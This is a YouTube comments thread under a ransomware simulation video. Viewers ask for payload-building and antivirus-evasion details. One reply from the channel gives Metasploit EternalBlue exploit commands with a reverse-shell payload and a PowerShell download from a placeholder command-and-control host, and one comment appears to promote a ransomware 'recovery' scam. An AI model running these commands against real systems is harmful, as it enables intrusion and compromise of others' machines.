Ransomware Attack Simulation

Поділитися
Вставка

КОМЕНТАРІ • 119

  • @MAG320
    @MAG320 Рік тому +28

    I would like to see how the ransomware was created (for ed purposes) so I can provide a debrief to a couple clients.

    • @UniqueMappingSequence
      @UniqueMappingSequence 7 місяців тому +17

      🤨🤨

    • @mohammadiaa
      @mohammadiaa 6 місяців тому +4

      Yeeees clients

    • @samajbhanproduction1520
      @samajbhanproduction1520 5 місяців тому

      IKIK

    • @lockardsecurity
      @lockardsecurity  4 місяці тому +4

      There are multiple parts of the attack, during the first part using the Word doc, it was created from scratch by me. I can create another video on the details of the document. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

    • @shayloerakker21
      @shayloerakker21 22 дні тому

      @@lockardsecurity

  • @Shhukoihee
    @Shhukoihee 5 місяців тому +8

    Need more videos on the practical red team
    You are explaining in the best way.
    I request you to make more videos to learn from you

  • @marvinokapo3321
    @marvinokapo3321 Рік тому +14

    Hey mate the Infection-Simulation document that you used to maintained the connection and to upload the malware in the victim machine where did you get it from? (Educational purpose). Thanks.

    • @lockardsecurity
      @lockardsecurity  4 місяці тому

      There are multiple parts of the attack, during the first part using the Word doc, it was created from scratch by me. I can create another video on the details of the document. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

    • @MrRobot-yb8cb
      @MrRobot-yb8cb 4 місяці тому

      @@lockardsecuritywould be interesting to see the document park breakdown!

    • @alialazawi2849
      @alialazawi2849 4 місяці тому

      @@lockardsecurity What about the environment? can we use it please?

  • @alexbrasilia6459
    @alexbrasilia6459 Рік тому +7

    Do you have a paid course to be possible we learn step by step about this ?

    • @lockardsecurity
      @lockardsecurity  4 місяці тому

      Its in the works, I should have more details to share in the coming weeks! Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

  • @SamuraiJack1881
    @SamuraiJack1881 2 роки тому +4

    Thank you for everyting bro, have a good job.

  • @Blacksheep-ik7gx
    @Blacksheep-ik7gx 2 місяці тому

    Did this office have macros set to auto run? Usually you get an enable content message before running anytime of VBS, or did you embed some shell code in the .docx

  • @CriAlch
    @CriAlch 2 місяці тому +1

    Hi Lockard,
    sorry i have a few questions since i don't quite understand how you gotten access to the device?
    -Did opening the word document execute macros to gain access?
    -And does the user have local admin rights to execute them right away?
    - If it wasn't through macros, how did you get access from a different location/outside of the target network with having the user only opening the word document?
    How could this be prevented?

  • @FriedrichAugustHaselwander-k2z
    @FriedrichAugustHaselwander-k2z Місяць тому

    Hello, I am working on documentation about botnets and their threats to modern institutions as part of my apprenticeship. I was wondering if you could help me set this up as part of a practical showcase for my presentation.
    Kind regards,
    Leon

  • @sagisar
    @sagisar 7 місяців тому +3

    I would thank you if you could give a link to your research with all the commands you used for the persistence part, of course just for educational purposes

    • @lockardsecurity
      @lockardsecurity  4 місяці тому

      I currently do not have them published publicly, however that said, I'll be working on more content for the channel and will include more details and commands in the future. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

  • @InternetVet
    @InternetVet 8 місяців тому +1

    just drop all inbound connections on port 5985 & 5986 to prevent this?

    • @lockardsecurity
      @lockardsecurity  4 місяці тому +1

      In this example, there is attack is a Reverse Shell connection. Meaning the victim's system is beaconing on to the Internet (Egress). Not sure if you noticed or not, but the first connection was over TCP port 443 HTTPS. Meaning if you drop all traffic outbound over 443, you may as well disconnect from the network because nothing will work. On the second connection, the outbound port was 53 DNS. Another big issue if you try and block DNS on your network. No BIND connection is being made, so I would hope and expect traffic is blocked inbound on those ports. Just know attackers (good ones), will leverage ports that MUST be open, like 53, 80, 443 to get their connections out of the network. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

  • @magnese7993
    @magnese7993 8 місяців тому

    Which kali tool did you used?

  • @zacharyaitken9478
    @zacharyaitken9478 2 місяці тому

    Is there any way you can show how to make the word doccument and the actual ransomware script? Aswell as a list of the commands you used?

  • @rstitan4791
    @rstitan4791 3 місяці тому

    Could this be prevented by a hardware firewall?

  • @conan5890
    @conan5890 Рік тому +9

    Nice video, explanation and demonstration.
    I think you should try again against a computer who has a paid license of antivirus (e.g ESET etc).
    The free version Windows defender has nothing in order to defend any attack.

    • @detective5253
      @detective5253 Рік тому +2

      this is interesting technique and similar somehow to a signed malware with a company's private signing key typically to backdoor whitelisted applications. modern cyber sec are getting way more sophisticated than ever.

    • @Farfromfuture
      @Farfromfuture Рік тому

      I Was Also Looking For That Type Of Videos Bro 🥲

    • @lockardsecurity
      @lockardsecurity  4 місяці тому

      Thanks for the feedback, I use antiscan.me to test detections on the payloads, I also have the paid version of CrowdStrike I test with as well. I'll add this to the list of videos to make. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

  • @hack-talk9098
    @hack-talk9098 2 роки тому +1

    Start with the full video so I learn how to create the payload and listener

    • @lockardsecurity
      @lockardsecurity  Рік тому

      I'll be creating an updated video with full end to end which will show the latest and greatest processes and methods.

  • @zilverfox-wu1yd
    @zilverfox-wu1yd Рік тому +1

    i assume you made a backdoor first, just how do you crypt it in kali linux plus exploit?

    • @lockardsecurity
      @lockardsecurity  Рік тому

      Its a broken Macro technique, I recommend taking the OSEP training to learn more about this method. I avoid using crypters as they are easily flagged as suspicious.

    • @zilverfox-wu1yd
      @zilverfox-wu1yd Рік тому

      @@lockardsecurity okay thanks lol

    • @kasinoFlow
      @kasinoFlow Рік тому

      @@lockardsecurityI want to learn more about hacking can you make a discord by anychance

  • @matt-i3r6w
    @matt-i3r6w 2 місяці тому

    Can you make a video how to protect from these type of attacks?

  • @sen7826
    @sen7826 5 місяців тому

    The whole process begins with opening malicious file. Is it possible to identify the file as malicious with the default Windows Defender scan? If not, what else can a layman do to recognise which files are unsafe?

    • @lockardsecurity
      @lockardsecurity  4 місяці тому +1

      Great question, and unfortunately as seen in this demo, Defender isn't able to detect an issue. Therefore you could do a few thinks:
      1. Scan for malware using trusted antivirus/anti-malware tools.
      2. Use VirusTotal for file analysis, www.virustotal.com is the site, Google owns them. Great way to get an idea as to what the majority of security vendors have to say about the file in question. Just know, that everything uploaded to VirusTotal can be downloaded by anyone that request it. Most folks are security researchers who work for security companies that make Ant-Virus / EDR products and use these uploads to help improve their detection logic. So the take away is, you dont want any classified data in a document ending up uploaded to VirusTotal. antiscan.me is a similar site and they dont submit uploads to 3rd parties like VirusTotal does.
      Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

    • @sen7826
      @sen7826 4 місяці тому

      @@lockardsecurity thank you for taking the time, this was very informative.

  • @Crypto_Dig
    @Crypto_Dig 7 місяців тому +4

    Can you make a tutorial on how to create such ransomware?(Love your content)

    • @Hogrider6.9
      @Hogrider6.9 7 місяців тому +1

      lol

    • @lockardsecurity
      @lockardsecurity  4 місяці тому

      I've kicked around a few ideas and yes there will be future videos to come on not just how to make them, but also how to evade detections from all the big name security tools.

    • @Hogrider6.9
      @Hogrider6.9 4 місяці тому

      @@lockardsecurity guess we will wait

  • @udohpele1696
    @udohpele1696 2 роки тому +1

    Thanks for this demo. On question please, if the user is not a local admin and is unable to run the file after clicking, will the hack still be successful?

    • @lockardsecurity
      @lockardsecurity  Рік тому +1

      Hi, I'm sorry for the delayed response as I'm just now seeing your question. A non admin user would still be able to open this file. In doing so the malicious code would still run, however it would be in the context of the users permissions. When this happens, the attack much do a privilege escalation attack to get admin / root access.

  • @jaydave4696
    @jaydave4696 Рік тому +1

    Hey! It's an absolute amazing video..but how can i get this codes..for my Ransomware project?can u reply pls.

  • @gho5t184
    @gho5t184 2 місяці тому

    hello i wanted to simulate the above attack for a clg project can anyone help me ?

  • @paradownload2051
    @paradownload2051 Рік тому

    Sir can i have a copy ofnthat simulation? For educational purposes, im into cybersec right now

  • @Gm-Rifat
    @Gm-Rifat Рік тому

    What kind of mail you are using ? How can I use it ? Is it free ?

  • @rafaelsandoval6472
    @rafaelsandoval6472 2 роки тому

    do you have a video where you put the malicious code into the macro file? Thank you

    • @lockardsecurity
      @lockardsecurity  Рік тому +1

      Hi, I'm sorry for the delayed response as I'm just now seeing your question. No I do not, the main reason for that is so AV vendors doesn't pick up some of my methods. That said, this one already is being detected, which is expected over time. I'll consider creating move videos on the entire process, start to finish. Along with diving deeper into the code and methods used.

  • @apitaremore9453
    @apitaremore9453 Рік тому +1

    how to remove ransomware??

    • @harshadsd90
      @harshadsd90 Рік тому

      same question tried all decryption methods but not work 😢😢

    • @HiChicken-zj7yc
      @HiChicken-zj7yc Рік тому

      cause u can't only the one who puts it in the system who can which u gonna need to pay for

  • @sadnanjuhib
    @sadnanjuhib 3 місяці тому +1

    I love this video ❤

  • @alialazawi2849
    @alialazawi2849 4 місяці тому +1

    I love the video!!

    • @lockardsecurity
      @lockardsecurity  4 місяці тому

      Thanks for watching, please like, share and subscribe as we'll be releasing more videos like this in the near future!

  • @shadowsalah1484
    @shadowsalah1484 9 місяців тому

    Hey guys hacker's control ransom with a C&C server?

  • @BlueZackMuthey
    @BlueZackMuthey Рік тому

    how did you get access to the targets computer?

    • @KnightMagnet
      @KnightMagnet Рік тому

      The link the victim clicked gave away the IP address, and with the IP, the hacker can basically access the victim.

    • @TK-od8hd
      @TK-od8hd Рік тому

      ​@@KnightMagnetso a Firewall rule will block this connection?

    • @issho8885
      @issho8885 Рік тому +1

      ​@@TK-od8hdonly if the attacker IP was known beforehand and it was put in the rule

    • @lockardsecurity
      @lockardsecurity  4 місяці тому

      It becomes a whack-a-mole game at that point. We recommend ingesting threat intel on what are called IoCs (Indicators of Compromise) which you can block known bad sources and destinations. However, advanced malware can be set up to talk to not just IPs but URLs, which an attacker can easily change DNS records on the fly. They can also have multiple IPs and URLs to call out to, which makes blocking it on the firewall near impossible in some cases.

  • @littleghoost
    @littleghoost Рік тому

    how to disable antivirus before infecting?

    • @lockardsecurity
      @lockardsecurity  4 місяці тому

      Each AV has its own steps to follow, most are been controlled via Registry or the running process memory space.

    • @littleghoost
      @littleghoost 4 місяці тому

      @@lockardsecurity Ok. Windows Defender for example, can it be disabled through the malware itself?

  • @rersheed
    @rersheed Рік тому

    HI! I have been trying to simulate ransomware traffic for testing a countermeasure but I couldn't. How can I simulate wannacry ransomware traffic?
    Best Regards

    • @lockardsecurity
      @lockardsecurity  4 місяці тому

      Each ransomware is slightly different, but also slightly similar. Great question and wish I could have responded sooner. I'll create a video on this topic as well. In the mean time for Wannacry, do the following:
      Tools and Steps for Simulation:
      1. Set Up a Controlled Environment:
      * Use a virtual lab with several Windows machines.
      * Ensure the environment is completely isolated from any production networks.
      2. Simulate Infection Traffic:
      * Metasploit Framework: Use Metasploit to simulate the EternalBlue exploit used by WannaCry.
      Load Metasploit with the EternalBlue module:
      bash
      Copy code
      msfconsole
      use exploit/windows/smb/ms17_010_eternalblue
      set RHOST
      set PAYLOAD windows/x64/meterpreter/reverse_tcp
      set LHOST
      exploit
      * Emulate Ransomware Activity: Create custom scripts to simulate typical ransomware behavior without actually encrypting files.
      * Create a script to mimic the creation of ransom notes, registry modifications, and dummy file encryption (rename files instead of encrypting).
      * Generate network traffic to simulate command and control (C2) communication:
      powershell, Copy code:
      $WebClient = New-Object System.Net.WebClient
      $WebClient.DownloadString("your-c2-server.com/command")
      3. Monitor and Analyze Traffic:
      * Use network monitoring tools like Wireshark to capture and analyze the simulated traffic.
      * Verify the detection of IOCs with your security tools (SIEM, IDS/IPS).
      4. Deploy Detection and Prevention Measures:
      * Implement rules in your security tools to detect the IOCs listed above.
      * Test the effectiveness of your security measures in detecting and responding to the simulated ransomware activity.
      Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

  • @meowtrox1234
    @meowtrox1234 Рік тому

    how about if you have a DYNAMIC IP ADDRESS? will ransomware be possible?

    • @sunrevolver
      @sunrevolver 4 місяці тому +1

      Yes

    • @lockardsecurity
      @lockardsecurity  4 місяці тому +2

      Yes, in this case, the ransomware will act more like a worm, scan the entire network and attempt to spread to all hosts that appear to be up.

  • @SSN5-R
    @SSN5-R Рік тому +1

    It's Kali Linux

  • @ronwurdesagendasises9249
    @ronwurdesagendasises9249 2 роки тому

    How do you make this Word Document without Makros?

    • @lockardsecurity
      @lockardsecurity  Рік тому +1

      Its a broken Macro technique. I recommend taking the OSEP training to learn more about this method.

  • @Dr.Yuzerssif
    @Dr.Yuzerssif Рік тому

    Thank you for this video. I need your help.. My laptop was exposed to a JAWR ransomware attack. I see that you are an expert in this field. I hope you can help me solve this complex problem. Thank you very much in advance

    • @lockardsecurity
      @lockardsecurity  4 місяці тому

      Sorry for the delay, I'm just now seeing your comment. I hope you were able to recover from that attack. Moving forward, I'll keep a closer eye on this channel as we start to create new content.

  • @sreerahul6663
    @sreerahul6663 Рік тому

    Hi bro
    If a pc is infected with ransomeware virus how to decrypt it please do a video

  • @fwiii1831
    @fwiii1831 2 роки тому

    How did you make it without WinDef or AV noticing or alarming? Can u tell me in 1-2 sentences how this exploit works and what I need to do? (educational purposes only)

    • @zilverfox-wu1yd
      @zilverfox-wu1yd Рік тому +1

      crypter

    • @lockardsecurity
      @lockardsecurity  Рік тому +3

      Hi, I'm sorry for the delayed response as I'm just now seeing your question. It requires creating the payload in away that is unique, without any suspicious indicators that would get flagged. Most crypters are easily detectable as suspicious,. It requires a lot of testing, trail and error. For example, the methods I used here no longer works, therefore you have to always continue to evolve the payloads to stay one step ahead of the detection engines.

  • @Ammar_Imam
    @Ammar_Imam Місяць тому

    Great and informative video! I’m a cybersecurity student, and I’d love to see how you disguised this malware script as a Word document without detection. For a university project (for learning purposes), I created a Trojan that establishes a reverse shell connection between the victim and the attacker, but I couldn’t embed it in a legitimate process.

  • @gernot4490
    @gernot4490 Рік тому

    does kaspersky allow opening the infected word-doc in the beginning of the vid? i dont think so so its preventing the ransomware attack?

    • @jacvbtaylor
      @jacvbtaylor 8 місяців тому

      That probably all depends on the exploit in the doc

    • @lockardsecurity
      @lockardsecurity  4 місяці тому

      This doc at the time was whats known as a FUD, meaning fully undetectable. However now just about all vendors flag it today. That said, I'll be recreating this video in the near future and will be showing it against all the major AV /' EDR vendors.

  • @styxnet._
    @styxnet._ 5 місяців тому +1

    bro this is so good

    • @lockardsecurity
      @lockardsecurity  4 місяці тому +1

      Thanks! Glad you enjoyed it, we'll be stepping up our response and content creation on this channel. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

  • @SteveRoufosse
    @SteveRoufosse 11 місяців тому +2

    Je parie que personne ne saurait m'envoyer un ransomware 😂

  • @electragammingtech9801
    @electragammingtech9801 2 роки тому

    give me the google sheet documents

  • @a6eu
    @a6eu Рік тому

    Hello Lord, I have final project tomotrow, and I need to demonstrate this attack to get bonus points, I really need this. Can you help me, plsss?!!

    • @lockardsecurity
      @lockardsecurity  Рік тому

      Dang, I'm just now seeing this comment! Hope you were able to do demonstrate this for your class.

    • @thewickedmma
      @thewickedmma 11 місяців тому

      broo help me out. im going through the same thingg

    • @abdullahiridwan-wj3pt
      @abdullahiridwan-wj3pt Місяць тому

      ​@@thewickedmmahello bro can I get your attention

  • @robertclark2607
    @robertclark2607 2 роки тому

    who would use windows ge

  • @networksolucoes7537
    @networksolucoes7537 9 місяців тому

    Muito boa apresentação!!

  • @Ghuffran11
    @Ghuffran11 Місяць тому

    This PC did not have any Antivirus… if there is corporate antivirus would this be avoided???

  • @itsmattg_shorts
    @itsmattg_shorts Рік тому +1

    So you don’t go to jail y’all, hack a vm lol

    • @lockardsecurity
      @lockardsecurity  4 місяці тому

      To be clear its my VM, and you can hack your own stuff, providing you give yourself permission to do so lol!

  • @dainanaikenraiko2952
    @dainanaikenraiko2952 Місяць тому

    Daamn this is so evil

  • @TECHANDFUN07
    @TECHANDFUN07 Місяць тому

    Hey there how i can get this virus ??

  • @thedarkside-t4s
    @thedarkside-t4s Місяць тому

    how you make thisundetectable payload

  • @danwolf1168
    @danwolf1168 Рік тому +2

    Instead of “hacker” you should say cyber criminal.

    • @saji002
      @saji002 Рік тому

      generally its hacker

    • @lockardsecurity
      @lockardsecurity  4 місяці тому

      True, bad actor is also on the list. But to be honest when I created this video I honestly thought it was going to be geared more toward NON security folks! How wrong was I, lol. Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

  • @mohamedamjath3884
    @mohamedamjath3884 Рік тому +1

    Hi, can i contact you pls

    • @lockardsecurity
      @lockardsecurity  4 місяці тому

      Yes, you can reach out to www.lockardsecurity.com
      Thanks for watching. Stay informed and secure! Don’t forget to like, comment, and subscribe for more cybersecurity insights and live attack demos.

  • @crestheproducer
    @crestheproducer 2 місяці тому

    @proteckdiamond resolveu o problema do ransomware pela primeira vez em l.G

  • @Can-d4i
    @Can-d4i Місяць тому

    how can i get a ransomware tools my friend is asking for educational purpose...